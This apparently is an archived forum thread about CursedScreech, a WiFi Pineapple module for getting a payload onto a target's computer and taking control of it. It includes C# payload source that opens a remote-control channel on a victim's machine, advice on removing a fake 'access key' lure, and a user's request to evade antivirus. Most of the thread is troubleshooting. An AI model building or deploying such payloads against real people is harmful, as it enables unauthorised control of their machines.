sud0nick (Author) Posted July 15, 2018

On 7/11/2018 at 6:11 PM, Ramez said:
> I was finally able to find the solution! Apart from everything else I did above, you need to add the 'targetlogs' folder to the following directory:
>
> /pineapple/modules/CursedScreech/includes/forest
>
> It looks like for some reason the new firmware updates have been causing issues where the 2 folders (keys & targetlogs) do not get created automatically. Anyway, hope this helps!

@Ramez thanks for finding this. I just verified that the targetlogs directory doesn't get created as it should. I'll work on a fix and push the update. I'll also look into the keys directory in PortalAuth as I'm sure it's related to the same issue.

Sebkinne Posted July 16, 2018

1 hour ago, sud0nick said:
> @Ramez thanks for finding this. I just verified that the targetlogs directory doesn't get created as it should. I'll work on a fix and push the update. I'll also look into the keys directory in PortalAuth as I'm sure it's related to the same issue.

I think that's my bad. I just realized that when we switched all modules from .tar.gz format to the git repository, empty directories would disappear. They'll need to be created programmatically instead.

sud0nick (Author) Posted July 16, 2018

1 hour ago, Sebkinne said:
> I think that's my bad. I just realized that when we switched all modules from .tar.gz format to the git repository, empty directories would disappear. They'll need to be created programmatically instead.

Yeah, it's my fault for not checking for their existence in the first place.

blatayue Posted July 20, 2018

You could also add a .gitkeep file to the directories as a placeholder so git doesn't remove them.

Ramez Posted July 25, 2018

I really appreciate the payload you have provided with the cursedscreech module, but I was just wondering, are there any other payloads out there that don't involve having to put it in an access key? In other words, the victim just has to download the executable file and run it, instead of having to do the whole generate access key thing. I've looked everywhere but can't seem to find any pre-configured payloads for the pineapple.

sud0nick (Author) Posted July 26, 2018

@Ramez when you generate the payload in Visual Studio just don't include the PA_Authorization class. Here's an example:

```csharp
using System;
using System.Drawing;
using System.Windows.Forms;
using PineappleModules;

namespace Payload
{
    public partial class Form1 : Form
    {
        // ***************** REMOVE THIS LINE *****************
        PA_Authorization pauth = new PA_Authorization();
        // ***************** REMOVE THIS LINE *****************

        public Form1()
        {
            InitializeComponent();

            CursedScreech cs = new CursedScreech();
            cs.startMulticaster("231.253.78.29", 19578);
            cs.setRemoteCertificateSerial("EF-BE-AD-DE");
            cs.setRemoteCertificateHash("1234567890ABCDEF");
            cs.startSecureServerThread("Payload.Payload.pfx", "#$My$ecuR3P4ssw*rd&");
        }

        private void Form1_FormClosing(object sender, FormClosingEventArgs e)
        {
            e.Cancel = true;
            this.Hide();
        }

        // ***************** REMOVE THIS FUNCTION *****************
        private void accessKeyButton_Click(object sender, EventArgs e)
        {
            // Request an access key from the Pineapple
            string key = pauth.getAccessKey();

            // Check if a key was returned
            string msg;
            if (key.Length > 0)
            {
                msg = "Your access key is unique to you so DO NOT give it away!\n\nAccess Key: " + key;
            }
            else
            {
                msg = "Failed to retrieve an access key from the server. Please try again later.";
            }

            // Display message to the user
            MessageBox.Show(msg);
        }
        // ***************** REMOVE THIS FUNCTION *****************
    }
}
```

The authorization function is just a trick anyway. There's no real dependency on the access key for Cursed Screech. However, the Payloader injection set in Portal Auth does require the access key to allow a target through Evil Portal. Maybe in the future I'll add a Payloader injection set that doesn't require the access key but for now you'll have to remove that functionality yourself.

display-names Posted August 6, 2018

First of all, thank you for the amazing support you have been giving. I do have a quick question. My target downloads and runs the payload fine, but although it shows up in the server log, Sein can't seem to make a connection. It never turns up in the target list in CursedScreech. Does anyone have any ideas why?

sud0nick (Author) Posted August 6, 2018

11 hours ago, display-names said:
> First of all, thank you for the amazing support you have been giving. I do have a quick question. My target downloads and runs the payload fine, but although it shows up in the server log, Sein can't seem to make a connection. It never turns up in the target list in CursedScreech. Does anyone have any ideas why?

How is your target connected to the Pineapple? There's an interface setting in the Settings pane that lets you select which interface Sein should listen on. Make sure it's listening on the one that's connected to the same network as your target.

display-names Posted August 7, 2018

11 hours ago, sud0nick said:
> How is your target connected to the Pineapple? There's an interface setting in the Settings pane that lets you select which interface Sein should listen on. Make sure it's listening on the one that's connected to the same network as your target.

Sein is listening on the br-lan interface, the target is connected through the open PineAP AP. Does that make sense?

sud0nick (Author) Posted August 8, 2018

16 hours ago, display-names said:
> Sein is listening on the br-lan interface, the target is connected through the open PineAP AP. Does that make sense?

The PineAP interface is wlan1. Not sure if you should see it on br-lan or not but try switching Sein to wlan1 and see if it works.

display-names Posted August 8, 2018

7 hours ago, sud0nick said:
> The PineAP interface is wlan1. Not sure if you should see it on br-lan or not but try switching Sein to wlan1 and see if it works.

Well, I only have the option to set it to br-lan, I do have the most up to date version though. I will just try to reinstall the module I guess. But just in case, any ideas why I can't set my Sein interface to anything except br-lan?

EDIT 1: reinstall didn't help, too bad

sud0nick (Author) Posted August 9, 2018

Never mind, wlan1 isn't available because by default it doesn't have an IP address. The only interfaces that appear in that dropdown are those that have an IP. br-lan should definitely be working. I'll look into it.

display-names Posted August 10, 2018

On 8/9/2018 at 2:58 AM, sud0nick said:
> Never mind, wlan1 isn't available because by default it doesn't have an IP address. The only interfaces that appear in that dropdown are those that have an IP. br-lan should definitely be working. I'll look into it.

Hey there, I have tried to get it to work, but no luck, did you have any more luck? :)

Aratim Posted February 15, 2019

On 8/10/2018 at 3:41 PM, display-names said:
> Hey there, I have tried to get it to work, but no luck, did you have any more luck? :)

Hi there, I had the same problem. I studied the code (PinappleModules.cs) and found out that in "startMulticaster" in the while loop it set the "localIP" as the wrong interface. So I had to disable the interface accordingly in the adapter settings - after all it chose the right interface.

fan Posted May 6, 2019

I'm looking for a way to crypt the payload that I build with Visual Studio to avoid detection. Help me, thanks.

sud0nick (Author) Posted May 8, 2019

On 5/6/2019 at 11:35 AM, fan said:
> I'm looking for a way to crypt the payload that I build with Visual Studio to avoid detection. Help me, thanks.

You want to encrypt the payload for transmission only or while it's on disk too? If you encrypt it on disk to bypass AV you won't be able to execute it. To run it you would need to decrypt it and at that point AV would get you anyway. The point in providing an API for this module is to allow you to create your own payloads and work around AV however you choose. You could possibly obfuscate your code but I don't think encryption is what you want.

fan Posted May 8, 2019

Thanks for the answer, how can I use your payload to create another to bypass AV. There is a video tutorial to learn how to do this. Any information on this subject would be appreciated.

cr4nk Posted October 18, 2019

Already messaged Nick, but figured I would post a reply to this topic to see if anyone else might have some insight. I have downloaded the module on a freshly fac-resetted pineapple that has had the firmware upgrade. I ran opkg update and got the depends installed. Tried to get everything running after using papers to generate certs and created a C# payload, but Sein will not start. I checked the backend and it was yelling at me about ssl module for python, got pip, installed ssl, and still nothing. Pretty confused at this point.

cr4nk Posted October 19, 2019

```
root@Pineapple:/pineapple/modules/CursedScreech/includes/forest# python sein.py &
root@Pineapple:/pineapple/modules/CursedScreech/includes/forest# Traceback (most recent call last):
  File "sein.py", line 56, in <module>
    sck.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, socket.inet_aton(MCAST_GROUP)+socket.inet_aton(IFACE))
socket.error: illegal IP address string passed to inet_aton
```

Is what I am getting when I try to run it manually from the back end.

Arratim Posted October 28, 2019

Hi there, When I try to start kuro, the following entries appear in the Activity log:

```
[+] Starting Kuro...
[>] Cleaning up sockets
```

Then it ends kuro and I cannot send any commands. In PortalAuth under payload the target is visible. I'm afraid I don't know how to fix this at the moment. Can anyone help? Thank you.

sud0nick (Author) Posted December 27, 2019

Version 1.6 is now available on GitHub! A PR has been submitted to the master repo. Here is the changelog:

December 26, 2019
- Fixed bug in latest firmware that saved module settings in an invalid state causing issues when running Sein.

JinJinks Posted June 16, 2020

On 10/18/2019 at 11:00 PM, cr4nk said:
> ```
> root@Pineapple:/pineapple/modules/CursedScreech/includes/forest# python sein.py &
> root@Pineapple:/pineapple/modules/CursedScreech/includes/forest# Traceback (most recent call last):
>   File "sein.py", line 56, in <module>
>     sck.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, socket.inet_aton(MCAST_GROUP)+socket.inet_aton(IFACE))
> socket.error: illegal IP address string passed to inet_aton
> ```
>
> Is what I am getting when I try to run it manually from the back end.

Exact same problem that I've gotten! Is there any solution for this?

sud0nick (Author) Posted July 18, 2020

Hey everyone, I've decided that I'm not going to maintain this module any longer. My reasons are similar to those I posted in the PortalAuth thread but also because the techniques used in this old module are no longer effective. The payloads are caught pretty easily by AV now, even Windows Defender! I think it's time for this module to ride off into the sunset.

As for the current issues people are facing with sein.py:

```
socket.error: illegal IP address string passed to inet_aton
```

This is probably because you haven't updated the interface setting from the module yet. You should select an interface and click the save button which will update the settings. You can also check /pineapple/modules/CursedScreech/includes/forest/settings to verify the correct IP address is set. You may have my Pineapple's local IP in there (192.168.0.138) which is throwing the exception.

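An added example, not part of the thread or of the module's code: a Python 3 pre-flight check for the two values that feed the `IP_ADD_MEMBERSHIP` call in the traceback, separating a malformed interface value from a well-formed address the host does not own. The function names are hypothetical, and the values are passed in directly because the format of the settings file is not shown in the thread.

```python
import ipaddress
import socket


def check_multicast_settings(mcast_group, iface_ip):
    """Return a list of problems with the two values; empty means usable."""
    problems = []
    try:
        if not ipaddress.IPv4Address(mcast_group).is_multicast:
            problems.append("group %r is outside 224.0.0.0/4" % mcast_group)
    except ValueError:
        problems.append("group %r is not an IPv4 address" % mcast_group)

    try:
        iface = ipaddress.IPv4Address(iface_ip)
    except ValueError:
        # This is the case that surfaces as the inet_aton error: an empty
        # value, an interface name such as "br-lan", or stray whitespace.
        problems.append("interface %r is not an IPv4 address" % iface_ip)
        return problems

    # A well-formed address can still be stale (copied from another device).
    # Binding a throwaway UDP socket to it shows whether this host owns it.
    probe = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        probe.bind((str(iface), 0))
    except OSError as exc:
        problems.append("interface %s is not assigned to this host (%s)"
                        % (iface, exc.strerror))
    finally:
        probe.close()
    return problems


def build_mreq(mcast_group, iface_ip):
    """Build the 8-byte ip_mreq value for IP_ADD_MEMBERSHIP, or raise."""
    problems = check_multicast_settings(mcast_group, iface_ip)
    if problems:
        raise ValueError("; ".join(problems))
    return socket.inet_aton(mcast_group) + socket.inet_aton(iface_ip)


if __name__ == "__main__":
    # Constructed sample values; 192.0.2.1 is a documentation address.
    for iface in ("0.0.0.0", "", "br-lan", "192.0.2.1"):
        print(repr(iface), check_multicast_settings("231.253.78.29", iface))
```
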
JediMasterX Posted July 25, 2020

My Pineapple is just dead meat, seems like it's dead for a while now... seems like the product and most importantly the community is no longer there... wake up HAK5 😓

JMX

Struthian Posted July 25, 2020

8 hours ago, JediMasterX said:
> My Pineapple is just dead meat, seems like it's dead for a while now... seems like the product and most importantly the community is no longer there... wake up HAK5 😓
>
> JMX

"Dead meat" is not a very diagnostic description. What have you done to it? How did you attempt a reset? Don't tell people to wake up if you can't really articulate what is going on. Look at the reset process. Follow it. Make sure it is powered properly according to the documentation. Start following the process exactly. Attempt to access it (and explain what happened), then if that doesn't work, follow the reset process. Never expect people to care what you write when you didn't write anything descriptive yourself. That is important to any community.

Archived
This topic is now archived and is closed to further replies.